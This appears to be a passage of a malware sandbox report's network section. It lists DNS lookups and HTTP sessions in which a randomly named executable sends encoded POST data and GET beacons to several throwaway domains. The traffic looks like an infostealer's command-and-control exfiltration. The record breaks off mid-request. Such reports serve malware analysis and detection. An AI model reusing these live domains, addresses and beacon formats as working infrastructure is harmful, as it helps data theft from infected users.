                                                Nov 25, 2024 13:45:55.905889988 CET5084253192.168.2.51.1.1.1
                                                Nov 25, 2024 13:45:56.314508915 CET53508421.1.1.1192.168.2.5
                                                Nov 25, 2024 13:46:10.718338013 CET6480053192.168.2.51.1.1.1
                                                Nov 25, 2024 13:46:11.192332029 CET53648001.1.1.1192.168.2.5
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Nov 25, 2024 13:45:08.101392984 CET192.168.2.51.1.1.10xe67Standard query (0)www.pemedee.shopA (IP address)IN (0x0001)false
                                                Nov 25, 2024 13:45:25.031147957 CET192.168.2.51.1.1.10x301cStandard query (0)www.reglagrisi.xyzA (IP address)IN (0x0001)false
                                                Nov 25, 2024 13:45:26.026258945 CET192.168.2.51.1.1.10x301cStandard query (0)www.reglagrisi.xyzA (IP address)IN (0x0001)false
                                                Nov 25, 2024 13:45:40.529922009 CET192.168.2.51.1.1.10x1e81Standard query (0)www.doodmuhendislik.onlineA (IP address)IN (0x0001)false
                                                Nov 25, 2024 13:45:55.905889988 CET192.168.2.51.1.1.10x7df2Standard query (0)www.cognetix.websiteA (IP address)IN (0x0001)false
                                                Nov 25, 2024 13:46:10.718338013 CET192.168.2.51.1.1.10xe4e3Standard query (0)www.zripidro-priek.sbsA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Nov 25, 2024 13:45:08.691190958 CET1.1.1.1192.168.2.50xe67No error (0)www.pemedee.shoppemedee.shopCNAME (Canonical name)IN (0x0001)false
                                                Nov 25, 2024 13:45:08.691190958 CET1.1.1.1192.168.2.50xe67No error (0)pemedee.shop3.33.130.190A (IP address)IN (0x0001)false
                                                Nov 25, 2024 13:45:08.691190958 CET1.1.1.1192.168.2.50xe67No error (0)pemedee.shop15.197.148.33A (IP address)IN (0x0001)false
                                                Nov 25, 2024 13:45:26.033735991 CET1.1.1.1192.168.2.50x301cNo error (0)www.reglagrisi.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                Nov 25, 2024 13:45:26.033735991 CET1.1.1.1192.168.2.50x301cNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                Nov 25, 2024 13:45:26.033735991 CET1.1.1.1192.168.2.50x301cNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                Nov 25, 2024 13:45:26.164715052 CET1.1.1.1192.168.2.50x301cNo error (0)www.reglagrisi.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                Nov 25, 2024 13:45:26.164715052 CET1.1.1.1192.168.2.50x301cNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                Nov 25, 2024 13:45:26.164715052 CET1.1.1.1192.168.2.50x301cNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                Nov 25, 2024 13:45:41.385516882 CET1.1.1.1192.168.2.50x1e81No error (0)www.doodmuhendislik.onlineredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                Nov 25, 2024 13:45:41.385516882 CET1.1.1.1192.168.2.50x1e81No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                Nov 25, 2024 13:45:41.385516882 CET1.1.1.1192.168.2.50x1e81No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                Nov 25, 2024 13:45:56.314508915 CET1.1.1.1192.168.2.50x7df2No error (0)www.cognetix.website209.74.64.59A (IP address)IN (0x0001)false
                                                Nov 25, 2024 13:46:11.192332029 CET1.1.1.1192.168.2.50xe4e3No error (0)www.zripidro-priek.sbs104.21.49.253A (IP address)IN (0x0001)false
                                                Nov 25, 2024 13:46:11.192332029 CET1.1.1.1192.168.2.50xe4e3No error (0)www.zripidro-priek.sbs172.67.198.22A (IP address)IN (0x0001)false
                                                • www.pemedee.shop
                                                • www.reglagrisi.xyz
                                                • www.doodmuhendislik.online
                                                • www.cognetix.website
                                                • www.zripidro-priek.sbs
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.5498033.33.130.190802140C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 25, 2024 13:45:08.830140114 CET510OUTGET /34mw/?66yHIJy0=lV2cRmnx0FXilEhPfZpPq92dnG52j/QoqXjGTFXGCyRw3OEGJ+HF1fmQ5H3Wo7ce76AoiMuOhG4wkWS+FEimc0ozfubLJga7WYw3/1RzG4ZgP834S4sDnL3IAG89uzHPig==&kb0=y00p-fqpV0lDx HTTP/1.1
                                                Host: www.pemedee.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                Accept-Language: en-US,en;q=0.9
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910C Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                Nov 25, 2024 13:45:09.977929115 CET414INHTTP/1.1 200 OK
                                                Server: openresty
                                                Date: Mon, 25 Nov 2024 12:45:09 GMT
                                                Content-Type: text/html
                                                Content-Length: 274
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 36 36 79 48 49 4a 79 30 3d 6c 56 32 63 52 6d 6e 78 30 46 58 69 6c 45 68 50 66 5a 70 50 71 39 32 64 6e 47 35 32 6a 2f 51 6f 71 58 6a 47 54 46 58 47 43 79 52 77 33 4f 45 47 4a 2b 48 46 31 66 6d 51 35 48 33 57 6f 37 63 65 37 36 41 6f 69 4d 75 4f 68 47 34 77 6b 57 53 2b 46 45 69 6d 63 30 6f 7a 66 75 62 4c 4a 67 61 37 57 59 77 33 2f 31 52 7a 47 34 5a 67 50 38 33 34 53 34 73 44 6e 4c 33 49 41 47 38 39 75 7a 48 50 69 67 3d 3d 26 6b 62 30 3d 79 30 30 70 2d 66 71 70 56 30 6c 44 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?66yHIJy0=lV2cRmnx0FXilEhPfZpPq92dnG52j/QoqXjGTFXGCyRw3OEGJ+HF1fmQ5H3Wo7ce76AoiMuOhG4wkWS+FEimc0ozfubLJga7WYw3/1RzG4ZgP834S4sDnL3IAG89uzHPig==&kb0=y00p-fqpV0lDx"}</script></head></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.54984185.159.66.93802140C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 25, 2024 13:45:26.169488907 CET766OUTPOST /0zz8/ HTTP/1.1
                                                Host: www.reglagrisi.xyz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 209
                                                Connection: close
                                                Cache-Control: no-cache
                                                Origin: http://www.reglagrisi.xyz
                                                Referer: http://www.reglagrisi.xyz/0zz8/
                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910C Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                Data Raw: 36 36 79 48 49 4a 79 30 3d 32 65 73 76 32 4d 76 62 5a 36 7a 70 52 66 38 6c 6c 4d 4e 70 63 4c 39 42 2b 41 38 52 6c 42 43 61 34 66 2b 5a 2b 46 47 37 68 52 30 50 49 56 35 64 58 6d 35 78 34 4d 65 31 52 62 50 61 65 37 66 30 43 64 54 4f 58 70 6c 71 4f 41 38 69 6d 79 75 69 35 77 38 73 41 76 67 6d 68 30 2b 6a 53 44 38 77 6a 6e 4a 56 30 39 7a 6b 65 50 75 48 31 45 43 2f 35 6c 74 30 66 6b 47 33 33 58 44 36 75 47 51 54 63 4e 54 4e 79 39 4e 4d 6d 6b 31 2f 58 52 52 64 7a 53 33 51 37 43 4f 77 2b 6d 77 79 69 47 33 74 49 53 35 51 76 4e 31 37 49 6d 47 38 35 61 4c 76 2f 73 30 73 43 47 34 6d 5a 45 35 78 36 77 69 53 36 68 44 31 69 66 51 3d
                                                Data Ascii: 66yHIJy0=2esv2MvbZ6zpRf8llMNpcL9B+A8RlBCa4f+Z+FG7hR0PIV5dXm5x4Me1RbPae7f0CdTOXplqOA8imyui5w8sAvgmh0+jSD8wjnJV09zkePuH1EC/5lt0fkG33XD6uGQTcNTNy9NMmk1/XRRdzS3Q7COw+mwyiG3tIS5QvN17ImG85aLv/s0sCG4mZE5x6wiS6hD1ifQ=


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.54984885.159.66.93802140C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 25, 2024 13:45:28.832938910 CET786OUTPOST /0zz8/ HTTP/1.1
                                                Host: www.reglagrisi.xyz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 229
                                                Connection: close
                                                Cache-Control: no-cache
                                                Origin: http://www.reglagrisi.xyz
                                                Referer: http://www.reglagrisi.xyz/0zz8/
                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910C Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                Data Raw: 36 36 79 48 49 4a 79 30 3d 32 65 73 76 32 4d 76 62 5a 36 7a 70 65 65 4d 6c 70 4d 78 70 4e 62 38 7a 78 67 38 52 2b 78 44 52 34 66 79 5a 2b 45 79 72 68 46 59 50 4a 30 4a 64 46 79 6c 78 35 4d 65 31 62 37 4f 65 54 62 66 2f 43 64 76 6f 58 6f 70 71 4f 41 6f 69 6d 7a 65 69 35 42 38 6a 43 2f 67 65 30 45 2b 6c 66 6a 38 77 6a 6e 4a 56 30 39 32 42 65 50 57 48 31 30 53 2f 6f 30 74 7a 41 55 47 6f 30 58 44 36 71 47 51 58 63 4e 54 2f 79 35 56 69 6d 6d 39 2f 58 52 68 64 7a 41 50 54 67 79 4f 36 7a 47 77 35 76 30 33 67 50 52 42 33 7a 2f 67 49 4f 6d 79 48 31 4d 36 46 6c 4f 38 45 52 6d 55 65 4a 58 78 47 72 41 44 37 67 43 54 46 38 49 47 59 4b 73 36 34 44 50 68 75 6e 53 42 66 32 41 57 62 55 38 4b 2f
                                                Data Ascii: 66yHIJy0=2esv2MvbZ6zpeeMlpMxpNb8zxg8R+xDR4fyZ+EyrhFYPJ0JdFylx5Me1b7OeTbf/CdvoXopqOAoimzei5B8jC/ge0E+lfj8wjnJV092BePWH10S/o0tzAUGo0XD6qGQXcNT/y5Vimm9/XRhdzAPTgyO6zGw5v03gPRB3z/gIOmyH1M6FlO8ERmUeJXxGrAD7gCTF8IGYKs64DPhunSBf2AWbU8K/


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.54985585.159.66.93802140C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 25, 2024 13:45:31.489171982 CET1803OUTPOST /0zz8/ HTTP/1.1
                                                Host: www.reglagrisi.xyz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 1245
                                                Connection: close
                                                Cache-Control: no-cache
                                                Origin: http://www.reglagrisi.xyz
                                                Referer: http://www.reglagrisi.xyz/0zz8/
                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910C Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                Data Raw: 36 36 79 48 49 4a 79 30 3d 32 65 73 76 32 4d 76 62 5a 36 7a 70 65 65 4d 6c 70 4d 78 70 4e 62 38 7a 78 67 38 52 2b 78 44 52 34 66 79 5a 2b 45 79 72 68 45 4d 50 4a 47 42 64 58 46 52 78 36 4d 65 31 64 4c 4f 64 54 62 66 6d 43 64 33 73 58 6f 31 51 4f 45 59 69 6e 52 57 69 2f 79 6b 6a 4c 2f 67 65 72 55 2b 67 53 44 38 35 6a 6d 6c 5a 30 2b 65 42 65 50 57 48 31 79 75 2f 34 56 74 7a 62 55 47 33 33 58 44 6d 75 47 51 37 63 4e 4c 46 79 35 59 58 6d 57 64 2f 58 78 78 64 38 54 33 54 73 79 4f 38 39 6d 78 35 76 30 36 67 50 52 4e 73 7a 2b 55 69 4f 6c 69 48 32 62 72 36 38 38 4d 50 50 6b 59 42 46 46 56 4e 36 31 4c 66 69 54 54 67 32 71 4f 6b 57 74 76 51 44 35 35 30 6b 54 30 4a 6a 48 79 74 5a 61 37 6a 66 71 4b 68 76 33 51 54 49 67 56 64 51 6a 72 73 78 4e 41 47 76 75 6f 6f 4a 6e 53 58 32 51 43 31 63 63 76 71 70 4d 51 48 77 62 42 74 6e 4b 50 76 43 59 31 7a 7a 5a 47 39 58 79 5a 47 32 76 51 72 4f 34 62 72 44 6a 58 6d 65 68 76 6a 30 78 6d 34 73 2f 31 44 4d 67 4a 68 42 65 36 4d 5a 65 56 39 32 4f 37 75 32 36 38 32 41 45 52 4a 45 [TRUNCATED]
                                                Data Ascii: 66yHIJy0=2esv2MvbZ6zpeeMlpMxpNb8zxg8R+xDR4fyZ+EyrhEMPJGBdXFRx6Me1dLOdTbfmCd3sXo1QOEYinRWi/ykjL/gerU+gSD85jmlZ0+eBePWH1yu/4VtzbUG33XDmuGQ7cNLFy5YXmWd/Xxxd8T3TsyO89mx5v06gPRNsz+UiOliH2br688MPPkYBFFVN61LfiTTg2qOkWtvQD550kT0JjHytZa7jfqKhv3QTIgVdQjrsxNAGvuooJnSX2QC1ccvqpMQHwbBtnKPvCY1zzZG9XyZG2vQrO4brDjXmehvj0xm4s/1DMgJhBe6MZeV92O7u2682AERJEvI+11h5x5OyLIpRATymmHWs4xB0J+jwlFpQRTgQMsxqCMq8Hpv4eHR/Ubfv7BvB+F6s1Dqqq44baLC0OWpHlu5GOAYYIlOa4zS7XtEUIDQU92QgT2OiyxcomYKEdg/jY9enm0vk801zl9JgbHo/9tbjYC/2niAir55T938/vgxeBzJDM7S/aIi1WaEBY4ffO/SA0Hb5sbimezprok1RQG6ZOcD2KD1E5goKSwS2vKiCP2peMgdhU52LMiVtopukmfqQNTF60JMnKu//S0t893F6x8wWt8hEJuBnlVpiRc1q9HvcZHWoLPFC+AzsohYLOON1LV+eIDlsbN6ZtwQqmv0gk9L/F2G+8hcRkoiy79giK2502oY4ACTqyBg0Ys+u7BhPBtAytrOMZ8oRRhucDPBuiVZjtqstSXiQj8E9BYBhNiOu/LtwFCLlgijxxDhU/TbxJIN0hW+iAbM8omJe0XG6OV5s+6o+kk1ZzaXHI3WfH5vtO2j7EqIyauG6Ff6suS1tP8zzh5k5YgBifEe4kClUf6nghBjou1LzKHVdymyAkMH01DundqHzaBcDks59jk4uhWvt2fyDXQDlmGzvztso2f77h9hBwEECozD2w+yZ24W1e3xIm5pPDvYhWzbz8Jqjz1caxOMUrDh0AHZPV5ISQFGShh7JrUT [TRUNCATED]


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.54986185.159.66.93802140C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 25, 2024 13:45:34.142415047 CET512OUTGET /0zz8/?66yHIJy0=7cEP14LQRsmKYf0RxKlrVIQIxmtU9D+RldOl4BCMwEJUAVNxY1goksq2QoLfI57UCvTcV6taODognwi8704pJ4gcp3yiRXYMqiAP6sz3W4747Aq9y3ZRdxST32LjlURtCA==&kb0=y00p-fqpV0lDx HTTP/1.1
                                                Host: www.reglagrisi.xyz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                Accept-Language: en-US,en;q=0.9
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910C Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                Nov 25, 2024 13:45:35.510227919 CET225INHTTP/1.1 404 Not Found
                                                Server: nginx/1.14.1
                                                Date: Mon, 25 Nov 2024 12:45:35 GMT
                                                Content-Length: 0
                                                Connection: close
                                                X-Rate-Limit-Limit: 5s
                                                X-Rate-Limit-Remaining: 19
                                                X-Rate-Limit-Reset: 2024-11-25T12:45:40.2931095Z


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.54987885.159.66.93802140C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 25, 2024 13:45:41.519741058 CET790OUTPOST /gvzn/ HTTP/1.1
                                                Host: www.doodmuhendislik.online
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 209
                                                Connection: close
                                                Cache-Control: no-cache
                                                Origin: http://www.doodmuhendislik.online
                                                Referer: http://www.doodmuhendislik.online/gvzn/
                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910C Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                Data Raw: 36 36 79 48 49 4a 79 30 3d 6c 35 69 4f 71 34 49 30 53 69 47 4e 72 70 51 50 44 4e 33 69 5a 6f 48 6b 43 32 34 6b 33 59 63 34 2f 38 39 73 4c 46 2f 5a 6f 52 52 34 41 66 48 51 6b 59 58 72 49 42 57 4f 51 61 6f 67 49 34 74 39 67 46 78 66 67 43 73 6c 4e 35 36 6d 38 42 37 59 71 79 4f 73 63 42 76 6d 57 61 61 57 69 6b 39 59 69 56 67 78 34 46 57 4e 76 4b 30 48 6d 4f 48 47 43 61 57 51 63 6f 76 4a 48 37 31 6f 42 42 54 73 34 4d 50 79 2b 75 4e 5a 46 43 70 73 72 58 51 57 6b 6f 69 79 53 32 2b 52 71 4a 45 2f 34 48 31 43 35 36 57 62 6b 4e 46 70 58 48 4d 61 5a 71 48 62 47 54 55 30 50 78 77 48 6f 6e 49 72 58 58 62 49 68 5a 33 43 31 48 6f 3d
                                                Data Ascii: 66yHIJy0=l5iOq4I0SiGNrpQPDN3iZoHkC24k3Yc4/89sLF/ZoRR4AfHQkYXrIBWOQaogI4t9gFxfgCslN56m8B7YqyOscBvmWaaWik9YiVgx4FWNvK0HmOHGCaWQcovJH71oBBTs4MPy+uNZFCpsrXQWkoiyS2+RqJE/4H1C56WbkNFpXHMaZqHbGTU0PxwHonIrXXbIhZ3C1Ho=


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.54988385.159.66.93802140C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 25, 2024 13:45:44.178072929 CET810OUTPOST /gvzn/ HTTP/1.1
                                                Host: www.doodmuhendislik.online
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 229
                                                Connection: close
                                                Cache-Control: no-cache
                                                Origin: http://www.doodmuhendislik.online
                                                Referer: http://www.doodmuhendislik.online/gvzn/
                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910C Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                Data Raw: 36 36 79 48 49 4a 79 30 3d 6c 35 69 4f 71 34 49 30 53 69 47 4e 71 4a 41 50 41 71 72 69 65 49 48 6a 63 47 34 6b 73 6f 63 38 2f 38 68 73 4c 45 4c 4a 6f 69 31 34 41 2b 33 51 32 4d 44 72 50 42 57 4f 62 36 6f 6c 47 59 74 30 67 46 30 69 67 47 73 6c 4e 36 47 6d 38 42 4c 59 70 46 61 74 65 52 76 6b 61 36 61 55 73 45 39 59 69 56 67 78 34 46 53 30 76 4b 38 48 6d 2b 58 47 41 37 57 54 43 59 76 4f 58 4c 31 6f 58 42 54 6f 34 4d 50 45 2b 76 52 2f 46 42 52 73 72 57 41 57 6c 36 61 39 4a 6d 2b 58 6b 70 46 62 79 6e 59 31 35 63 61 4b 6e 4d 77 4a 48 6d 38 31 59 63 32 78 63 78 63 63 63 52 63 2f 34 30 41 63 47 6e 36 68 37 36 6e 79 72 51 38 6a 7a 45 79 38 50 35 75 78 6e 4f 36 2b 5a 4d 46 54 4a 65 63 44
                                                Data Ascii: 66yHIJy0=l5iOq4I0SiGNqJAPAqrieIHjcG4ksoc8/8hsLELJoi14A+3Q2MDrPBWOb6olGYt0gF0igGslN6Gm8BLYpFateRvka6aUsE9YiVgx4FS0vK8Hm+XGA7WTCYvOXL1oXBTo4MPE+vR/FBRsrWAWl6a9Jm+XkpFbynY15caKnMwJHm81Yc2xcxcccRc/40AcGn6h76nyrQ8jzEy8P5uxnO6+ZMFTJecD


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.54989085.159.66.93802140C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 25, 2024 13:45:46.839812994 CET1827OUTPOST /gvzn/ HTTP/1.1
                                                Host: www.doodmuhendislik.online
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 1245
                                                Connection: close
                                                Cache-Control: no-cache
                                                Origin: http://www.doodmuhendislik.online
                                                Referer: http://www.doodmuhendislik.online/gvzn/
                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910C Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                Data Raw: 36 36 79 48 49 4a 79 30 3d 6c 35 69 4f 71 34 49 30 53 69 47 4e 71 4a 41 50 41 71 72 69 65 49 48 6a 63 47 34 6b 73 6f 63 38 2f 38 68 73 4c 45 4c 4a 6f 69 39 34 41 6f 72 51 6b 39 44 72 4f 42 57 4f 57 61 6f 6b 47 59 73 6d 67 46 4d 6d 67 47 67 31 4e 38 4b 6d 2b 67 72 59 69 58 69 74 55 52 76 6b 53 61 61 4a 69 6b 39 33 69 56 51 50 34 46 69 30 76 4b 38 48 6d 34 54 47 57 36 57 54 41 59 76 4a 48 37 31 65 42 42 54 41 34 49 6a 55 2b 76 46 4a 46 77 78 73 72 32 77 57 6a 50 32 39 46 6d 2b 56 70 4a 46 44 79 6e 55 71 35 61 2b 47 6e 4d 30 76 48 68 49 31 5a 71 6a 75 59 51 51 78 41 33 64 63 2f 48 49 52 66 52 36 47 6c 5a 69 42 67 6e 49 48 30 67 65 41 46 5a 47 6f 78 36 48 67 4c 34 74 69 46 59 56 4d 6b 63 4a 57 31 78 78 34 67 79 77 36 2f 31 72 59 67 56 74 4b 4b 59 62 49 69 65 51 32 55 75 46 52 7a 58 70 54 46 64 58 36 57 69 59 65 4e 61 76 71 71 78 2b 2b 53 75 43 59 66 6f 31 72 73 4e 39 2b 45 32 6f 47 42 72 32 63 45 75 6e 32 35 45 4b 4e 33 4f 72 64 77 7a 74 6d 49 5a 4d 43 35 30 44 43 71 38 78 33 56 68 34 33 42 2f 52 77 71 [TRUNCATED]
                                                Data Ascii: 66yHIJy0=l5iOq4I0SiGNqJAPAqrieIHjcG4ksoc8/8hsLELJoi94AorQk9DrOBWOWaokGYsmgFMmgGg1N8Km+grYiXitURvkSaaJik93iVQP4Fi0vK8Hm4TGW6WTAYvJH71eBBTA4IjU+vFJFwxsr2wWjP29Fm+VpJFDynUq5a+GnM0vHhI1ZqjuYQQxA3dc/HIRfR6GlZiBgnIH0geAFZGox6HgL4tiFYVMkcJW1xx4gyw6/1rYgVtKKYbIieQ2UuFRzXpTFdX6WiYeNavqqx++SuCYfo1rsN9+E2oGBr2cEun25EKN3OrdwztmIZMC50DCq8x3Vh43B/RwqVOfVvGZFrUWXbPvk86OcNpW1IYwarYRFi84K44oACHpT+o1v6z0U0e+noKIyrh87jaPgh1todNGe0qfkWnBj3cP1TlMnBRizYHq79INB2Z37MRVBPmDVvY8VI9lOYepmhQyiAGafw8FLAFZxukjLMaiEqjXa5rTIYIM9KGA7CG8ZiYF9eoKIMjFXQFcRjgxprMxj/FlTxJNl7b53J6BIY46ZswLRIjd3aogWHp592L4gTJlPwgitgm8ioiCv/TZhliTCB1CyTQv35QF7fj/ucVIgmXyoFz8NqBxizTTX6emvP8bZ2/IccTo2P+fEackDv+GOAdD27wt2NpsTn8NJ9i8Wc7XV8tDzmXnb4knZuMhM6kyCsgoWoEJejnDVCtgBiHF5/ANtcAblC3UfvgfyUWubOgKggddtKrBlN3gpu4NxjWrWbG+ip7/dRshDMG5lsh/6OtT/sy8XrPALbebT0rNRNAc9d3AHDCNRWS1jYyyDs8d2QD2vtU4UEyrui0p2ODxDPIC20OMtiOMJiQMQizRotOil0duxcoEF3lEGWDF04Dq0YGcHM4T3qngl8CCpQKxGBBOSfygDMvlmr/ua3aDjG31qKKMIKzg/Fu0Oh4+ATEgwwlWBlvjQZnBjW3bL0I0ITaPHrINP0lvSR82Sj70pPBfjzONG+Z [TRUNCATED]


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.54989785.159.66.93802140C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 25, 2024 13:45:49.512181997 CET520OUTGET /gvzn/?66yHIJy0=o7KupOcAdWG3nNYrbq63Y8DzVnVB0qlwhMl7Hzztm2YkQ+XZ5fWrExX6f74/Q+gqqRwMkXMPRKrB5xjKrizfc0njWqGlsy1S02QFwmKvno45o6r8NJKsDvPhV7F8JiCX6A==&kb0=y00p-fqpV0lDx HTTP/1.1
                                                Host: www.doodmuhendislik.online
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                Accept-Language: en-US,en;q=0.9
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910C Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                Nov 25, 2024 13:45:50.889753103 CET225INHTTP/1.1 404 Not Found
                                                Server: nginx/1.14.1
                                                Date: Mon, 25 Nov 2024 12:45:50 GMT
                                                Content-Length: 0
                                                Connection: close
                                                X-Rate-Limit-Limit: 5s
                                                X-Rate-Limit-Remaining: 19
                                                X-Rate-Limit-Reset: 2024-11-25T12:45:55.6671028Z


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                9192.168.2.549912209.74.64.59802140C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 25, 2024 13:45:56.449096918 CET772OUTPOST /qttd/ HTTP/1.1
                                                Host: www.cognetix.website
